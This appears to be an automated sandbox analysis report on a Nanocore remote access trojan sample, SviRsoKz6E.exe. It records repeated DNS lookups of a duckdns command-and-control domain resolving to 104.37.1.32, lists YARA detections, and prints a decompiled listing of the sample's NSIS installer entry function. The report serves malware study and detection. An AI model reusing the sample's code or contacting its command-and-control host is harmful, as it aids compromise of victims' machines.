                Apr 4, 2021 23:28:31.679709911 CEST192.168.2.38.8.8.80x6998Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:37.741369963 CEST192.168.2.38.8.8.80x525bStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:44.654107094 CEST192.168.2.38.8.8.80xdf66Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:51.660936117 CEST192.168.2.38.8.8.80x8befStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:28:58.669763088 CEST192.168.2.38.8.8.80x16fcStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:05.785725117 CEST192.168.2.38.8.8.80x34b5Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:12.945137978 CEST192.168.2.38.8.8.80x3293Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:19.796566010 CEST192.168.2.38.8.8.80x2acfStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:26.843811989 CEST192.168.2.38.8.8.80x162dStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:33.802197933 CEST192.168.2.38.8.8.80xd4cfStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:40.857156992 CEST192.168.2.38.8.8.80xc41eStandard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)
                Apr 4, 2021 23:29:49.050914049 CEST192.168.2.38.8.8.80x4242Standard query (0)justinalwhitedd554.duckdns.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 4, 2021 23:27:49.261029005 CEST8.8.8.8192.168.2.30xb115No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:27:56.662151098 CEST8.8.8.8192.168.2.30x1578No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:03.761682034 CEST8.8.8.8192.168.2.30x7c8bNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:10.640908003 CEST8.8.8.8192.168.2.30x50b7No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:17.801120996 CEST8.8.8.8192.168.2.30x5bbcNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:24.894534111 CEST8.8.8.8192.168.2.30x4f37No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:31.734234095 CEST8.8.8.8192.168.2.30x6998No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:37.795965910 CEST8.8.8.8192.168.2.30x525bNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:44.702361107 CEST8.8.8.8192.168.2.30xdf66No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:51.716820002 CEST8.8.8.8192.168.2.30x8befNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:28:58.726671934 CEST8.8.8.8192.168.2.30x16fcNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:06.010046005 CEST8.8.8.8192.168.2.30x34b5No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:12.999483109 CEST8.8.8.8192.168.2.30x3293No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:19.851269960 CEST8.8.8.8192.168.2.30x2acfNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:27.060240030 CEST8.8.8.8192.168.2.30x162dNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:33.857985020 CEST8.8.8.8192.168.2.30xd4cfNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:40.911663055 CEST8.8.8.8192.168.2.30xc41eNo error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)
                Apr 4, 2021 23:29:49.105664015 CEST8.8.8.8192.168.2.30x4242No error (0)justinalwhitedd554.duckdns.org104.37.1.32A (IP address)IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: SviRsoKz6E.exe PID: 2212 Parent PID: 5724

                General

                Start time:23:27:43
                Start date:04/04/2021
                Path:C:\Users\user\Desktop\SviRsoKz6E.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\SviRsoKz6E.exe'
                Imagebase:0x400000
                File size:700444 bytes
                MD5 hash:5D59200D61BA34E07E26132F5ACD9619
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                Reputation:low

                Chronological Activities

                Analysis Process: SviRsoKz6E.exe PID: 632 Parent PID: 2212

                General

                Start time:23:27:44
                Start date:04/04/2021
                Path:C:\Users\user\Desktop\SviRsoKz6E.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\SviRsoKz6E.exe'
                Imagebase:0x400000
                File size:700444 bytes
                MD5 hash:5D59200D61BA34E07E26132F5ACD9619
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.466831873.00000000056A0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.466831873.00000000056A0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:low

                Chronological Activities

                Disassembly

                Code Analysis

                Reset < >

                  Analysis Process: SviRsoKz6E.exe PID: 2212 Parent PID: 5724 SviRsoKz6E.exeCOMMON

                  Executed Functions

                  Function 00403312, Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366stringcomfileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42472c = _t42;
				if(_t42 != 6) {
					_t119 = E004064CA(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E0040645C(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E004064CA(0xb);
				 *0x424724 = E004064CA(9);
				_t47 = E004064CA(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42472f =  *0x42472f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x4247f8 = _t47;
				SHGetFileInfoA(0x41fce8, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060C1(0x423f20, "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\hardz\\Desktop\\SviRsoKz6E.exe\" ";
				E004060C1(_t160, _t51);
				 *0x424720 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\hardz\\Desktop\\SviRsoKz6E.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M0042A001;
				}
				_t55 = CharNextA(E00405A84(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405A84(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060C1("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E004032E1(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E004037FA();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x4247d4;
													if( *0x4247d4 == 0) {
														L67:
														_t63 =  *0x4247ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E004064CA(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E004057DD( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x424740 == 0) {
												L42:
												 *0x4247ec =  *0x4247ec | 0xffffffff;
												 *(_t164 + 0x18) = E004038D4( *0x4247ec);
												goto L43;
											}
											_t153 = E00405A84(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E00405748(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E0040572B();
														} else {
															E004056AE();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060C1("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
														}
														E004060C1(0x425000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x425400 = "A";
														do {
															E00406154(0, 0x41f8e8, _t157, 0x41f8e8,  *((intOrPtr*)( *0x424734 + 0x120)));
															DeleteFileA(0x41f8e8);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\SviRsoKz6E.exe", 0x41f8e8, 1) != 0) {
																E00405EA0(_t137, 0x41f8e8, 0);
																E00406154(0, 0x41f8e8, _t157, 0x41f8e8,  *((intOrPtr*)( *0x424734 + 0x124)));
																_t94 = E00405760(0x41f8e8);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x425400 =  *0x425400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405EA0(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B47(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060C1("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												E004060C1("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004032E1(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004032E1(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x4247e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                  0x00403322
                  0x00403326
                  0x0040332e
                  0x00403332
                  0x00403337
                  0x00403343
                  0x0040334c
                  0x00403351
                  0x00403354
                  0x0040335b
                  0x00403362
                  0x00403362
                  0x0040335b
                  0x00403364
                  0x00403369
                  0x0040336a
                  0x00403376
                  0x0040337a
                  0x00403380
                  0x0040338e
                  0x00403393
                  0x0040339a
                  0x0040339e
                  0x004033a2
                  0x004033a4
                  0x004033a4
                  0x004033a2
                  0x004033ac
                  0x004033b3
                  0x004033b9
                  0x004033cf
                  0x004033df
                  0x004033e4
                  0x004033ea
                  0x004033f1
                  0x004033fd
                  0x00403407
                  0x00403409
                  0x0040340b
                  0x00403410
                  0x00403410
                  0x00403420
                  0x00403426
                  0x004034ef
                  0x004034ef
                  0x004034f1
                  0x004034f3
                  0x00000000
                  0x00000000
                  0x0040342f
                  0x00403432
                  0x0040343a
                  0x0040343a
                  0x0040343d
                  0x00403442
                  0x00403444
                  0x00403444
                  0x00403445
                  0x00403445
                  0x0040344a
                  0x0040344d
                  0x004034df
                  0x004034e4
                  0x004034e9
                  0x004034ec
                  0x004034ee
                  0x004034ee
                  0x004034ee
                  0x00000000
                  0x00403453
                  0x00403453
                  0x00403454
                  0x00403457
                  0x0040346f
                  0x0040349a
                  0x0040349c
                  0x004034af
                  0x004034da
                  0x004034dd
                  0x004034fb
                  0x004034fe
                  0x00403507
                  0x0040350c
                  0x00403512
                  0x0040351d
                  0x0040351f
                  0x00403524
                  0x00403526
                  0x0040357e
                  0x00403583
                  0x0040358d
                  0x00403594
                  0x00403598
                  0x0040362c
                  0x0040362c
                  0x00403631
                  0x00403637
                  0x0040363c
                  0x00403760
                  0x00403766
                  0x004037e2
                  0x004037e2
                  0x004037e7
                  0x004037ea
                  0x004037ec
                  0x004037ec
                  0x004037f4
                  0x004037f4
                  0x00403776
                  0x0040377e
                  0x00403780
                  0x00403781
                  0x0040378e
                  0x004037a1
                  0x004037a9
                  0x004037ad
                  0x004037ad
                  0x004037b5
                  0x004037ba
                  0x004037c1
                  0x004037cf
                  0x004037d1
                  0x004037d7
                  0x004037d9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004037c3
                  0x004037c9
                  0x004037cb
                  0x004037cd
                  0x004037db
                  0x004037dd
                  0x00000000
                  0x004037dd
                  0x00000000
                  0x004037cd
                  0x004037c1
                  0x0040364b
                  0x00403652
                  0x00403652
                  0x004035a4
                  0x0040361c
                  0x0040361c
                  0x00403628
                  0x00000000
                  0x00403628
                  0x004035ad
                  0x004035b1
                  0x004035e7
                  0x004035e7
                  0x004035e9
                  0x004035f1
                  0x00403663
                  0x00403665
                  0x0040366c
                  0x00403674
                  0x00403674
                  0x0040367f
                  0x00403684
                  0x00403693
                  0x00403697
                  0x00403698
                  0x004036a1
                  0x0040369a
                  0x0040369a
                  0x0040369a
                  0x004036a7
                  0x004036ad
                  0x004036b3
                  0x004036bb
                  0x004036bb
                  0x004036c9
                  0x004036ce
                  0x004036e0
                  0x004036e8
                  0x004036ee
                  0x004036fa
                  0x00403700
                  0x0040370a
                  0x00403720
                  0x00403731
                  0x00403737
                  0x0040373e
                  0x00403741
                  0x00403747
                  0x00403747
                  0x0040373e
                  0x0040374b
                  0x00403751
                  0x00403751
                  0x00403756
                  0x00403756
                  0x00000000
                  0x00403693
                  0x004035f3
                  0x004035f5
                  0x00403600
                  0x00000000
                  0x00000000
                  0x00403608
                  0x00403613
                  0x00403618
                  0x00000000
                  0x00403618
                  0x004035dc
                  0x004035de
                  0x004035e2
                  0x004035e5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004035e5
                  0x00000000
                  0x004035de
                  0x0040352e
                  0x0040353a
                  0x0040353f
                  0x00403544
                  0x00403546
                  0x00000000
                  0x00000000
                  0x0040354e
                  0x00403556
                  0x00403567
                  0x0040356f
                  0x00403571
                  0x00403576
                  0x00403578
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403578
                  0x00000000
                  0x004034dd
                  0x0040349e
                  0x004034a1
                  0x004034a4
                  0x004034aa
                  0x004034aa
                  0x004034aa
                  0x004034aa
                  0x00000000
                  0x004034aa
                  0x004034a6
                  0x004034a8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004034a8
                  0x00403459
                  0x0040345c
                  0x0040345f
                  0x00403465
                  0x00403465
                  0x00000000
                  0x00403465
                  0x00403461
                  0x00403463
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403463
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403434
                  0x00403434
                  0x00403434
                  0x00403435
                  0x00403435
                  0x00000000
                  0x00403434
                  0x00000000

                  APIs
                  • SetErrorMode.KERNELBASE ref: 00403337
                  • GetVersion.KERNEL32 ref: 0040333D
                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403370
                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033AC
                  • OleInitialize.OLE32(00000000), ref: 004033B3
                  • SHGetFileInfoA.SHELL32(0041FCE8,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033CF
                  • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004033E4
                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,00000020,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403420
                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 0040351D
                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040352E
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040353A
                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354E
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403556
                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403567
                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040356F
                  • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403583
                    • Part of subcall function 004064CA: GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                    • Part of subcall function 004064CA: GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                    • Part of subcall function 004038D4: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SviRsoKz6E.exe" ,00000000), ref: 004038EE
                    • Part of subcall function 004038D4: lstrlenA.KERNEL32(Mfkeoxlzmclr,?,?,?,Mfkeoxlzmclr,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D28,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D28,00000000,00000002,74B5FA90), ref: 004039C4
                    • Part of subcall function 004038D4: lstrcmpiA.KERNEL32(?,.exe,Mfkeoxlzmclr,?,?,?,Mfkeoxlzmclr,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D28,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D28,00000000), ref: 004039D7
                    • Part of subcall function 004038D4: GetFileAttributesA.KERNEL32(Mfkeoxlzmclr), ref: 004039E2
                    • Part of subcall function 004038D4: LoadImageA.USER32 ref: 00403A2B
                    • Part of subcall function 004038D4: RegisterClassA.USER32 ref: 00403A68
                    • Part of subcall function 004037FA: CloseHandle.KERNEL32(000002A8,00403631,?,?,00000007,00000009,0000000B), ref: 00403805
                  • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403631
                  • ExitProcess.KERNEL32 ref: 00403652
                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 0040376F
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403776
                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378E
                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AD
                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004037D1
                  • ExitProcess.KERNEL32 ref: 004037F4
                    • Part of subcall function 004057DD: MessageBoxIndirectA.USER32(0040A218), ref: 00405838
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
